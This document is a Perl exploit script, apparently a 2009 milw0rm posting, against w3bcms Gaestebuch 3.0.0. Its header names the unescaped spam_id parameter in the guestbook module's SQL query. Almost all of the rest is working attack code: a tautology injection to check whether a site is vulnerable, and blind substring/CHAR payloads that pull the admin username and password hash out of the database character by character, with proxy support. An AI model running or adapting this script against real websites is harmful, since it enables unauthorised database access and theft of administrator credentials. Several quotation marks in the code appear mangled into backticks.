w3bcms Gaestebuch 3.0.0 Blind SQL Injection Exploit#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Request::Common qw(POST);
use Getopt::Long;

#                           \#'#/
#                           (-.-)
#    ------------------oOO---(_)---OOo-----------------
#    |          __             __                     |
#    |    _____/ /_____ ______/ /_  __  ______ ______ |
#    |   / ___/ __/ __ `/ ___/ __ \/ / / / __ `/ ___/ |
#    |  (__  ) /_/ /_/ / /  / /_/ / /_/ / /_/ (__  )  |
#    | /____/\__/\__,_/_/  /_.___/\__,_/\__, /____/   |
#    | Security Research Division      /____/ 2oo9    |
#    --------------------------------------------------
#    |  w3bcms Gaestebuch v3.0.0 Blind SQL Injection  |
#    |       (requires magic_quotes_gpc = Off)        |
#    --------------------------------------------------
# [!] Discovered.: DNX
# [!] Vendor.....: http://www.w3bcms.de
# [!] Detected...: 26.03.2009
# [!] Reported...: 29.03.2009
# [!] Response...: xx.xx.2009
#
# [!] Background.: CMS features in the frontend:
#                  » Ausgabe angelegter Seiten
#                  » Integrierter sicherer Spamschutz (kein Captcha!)
#                  » CMS Features wie Slogan Rotation, Datumausgabe, Seitenanzeige
#                  » Integrierter Besuchercounter (versteckt/sichtbar)
#               <b>» Sicherheit gegen Hackangriffe</b>
#                  » Schnelle Datenbankabfragen
#                  » 100% Suchmaschinenoptimiert (SEO)
#                  » Erweiterbar durch Module &amp; Addons
#                  » Unterstützt Mod Rewrite URL's (optional)
#
# [!] Bug........: $_POST['spam_id'] in includes/module/book/index.inc.php near line 42
#
#                  37: } else if (isset($_GET['action']) &amp;&amp; $_GET['action'] == `eintragen` &amp;&amp; $modul_settings['aktiv'] == `0`) {
#                  38:
#                  39:         $_POST['spamschutz'] = mysql_real_escape_string($_POST['spamschutz']);
#                  40:         $_POST['spamschutz'] = strtolower($_POST['spamschutz']);
#                  41:
#                  42:         $data = mysql_fetch_assoc(mysql_query(`SELECT * FROM spamschutz WHERE id='`.$_POST['spam_id'].`' AND antwort='`.$_POST['spamschutz'].`'`));
#
# [!] Solution...: no response from vendor but the vendor has updated the module package
#

if(!$ARGV[2])
{
  print `\n                        \\#'#/                     `;
  print `\n                        (-.-)                      `;
  print `\n   ----------------oOO---(_)---OOo-----------------`;
  print `\n   | w3bcms Gaestebuch v3.0.0 Blind SQL Injection |`;
  print `\n   |                coded by DNX                  |`;
  print `\n   ------------------------------------------------`;
  print `\n[!] Usage: perl w3bcms.pl [Target] <Options>`;
  print `\n[!] Example: perl w3bcms.pl -2 -u \`http://127.0.0.1/w3b/index.php?seite=2.gaestebuch\``;
  print `\n[!] Targets:`;
  print `\n       -1              Get admin username`;
  print `\n       -2              Get admin password hash`;
  print `\n[!] Options:`;
  print `\n       -u [url]        URL to vuln website`;
  print `\n       -p [ip:port]    Proxy support`;
  print `\n`;
  exit;
}

my %options = ();
GetOptions(\%options, `1`, `2`, `u=s`, `p=s`);
my $ua      = LWP::UserAgent->new();
my $target  = $options{`u`}.`&amp;action=eintragen`;

if($options{`p`})
{
  $ua->proxy('http', `http://`.$options{`p`});
}

print `[!] Exploiting...\n`;

check_bug($target);

if($options{`1`}) { get_username($target); }
elsif($options{`2`}) { get_password($target); }

print `\n[!] Exploit done\n`;

sub check_bug
{
  my $url = shift;
  syswrite(STDOUT, `[!] Checking bug @ website: ` , 28);
  my $inj = `' or 1=1/*`;
  my $req = POST $url, [spam_id => $inj];
  
  my $res = $ua->request($req);
  if($res->content =~ /Bitte geben Sie Ihren Namen an/)
  {
    syswrite(STDOUT, `vuln`, 4);
    print `\n`;
  }
  else
  {
    syswrite(STDOUT, `not vuln`, 8);
    exit;
  }
}

sub get_username
{
  my $target = shift;
  syswrite(STDOUT, `[!] Get username: `, 18);
  for(my $i = 1; $i <= 32; $i++)
  {
    my $found = 0;
    my $h = 32;
    while(!$found &amp;&amp; $h <= 126)
    {
      if(exploit($target, $i, $h, `benutzername`))
      {
        $found = 1;
        syswrite(STDOUT, chr($h), 1);
      }
      $h++;
    }
  }  
}

sub get_password
{
  my $target = shift;
  syswrite(STDOUT, `[!] Get Hash: `, 14);
  for(my $i = 1; $i <= 32; $i++)
  {
    my $found = 0;
    my $h = 48;
    while(!$found &amp;&amp; ($h <= 57 || $h <= 102))
    {
      if(exploit($target, $i, $h, `passwort`))
      {
        $found = 1;
        syswrite(STDOUT, chr($h), 1);
      }
      if($h == 57)
      {
        $h = 97;
      }
      else
      {
        $h++;
      }
    }
  }
}

sub exploit
{
  my $url = shift;
  my $i   = shift;
  my $h   = shift;
  my $c   = shift;
  my $inj = `' or 1=1 and substring((select `.$c.` FROM admin limit 1),`.$i.`,1)=CHAR(`.$h.`)/*`;
  my $req = POST $url, [spam_id => $inj];
  
  my $res = $ua->request($req);
  if($res->content =~ /Bitte geben Sie Ihren Namen an/)
  {
    return 1;
  }
  else
  {
    return 0;
  }
}

# milw0rm.com [2009-04-10]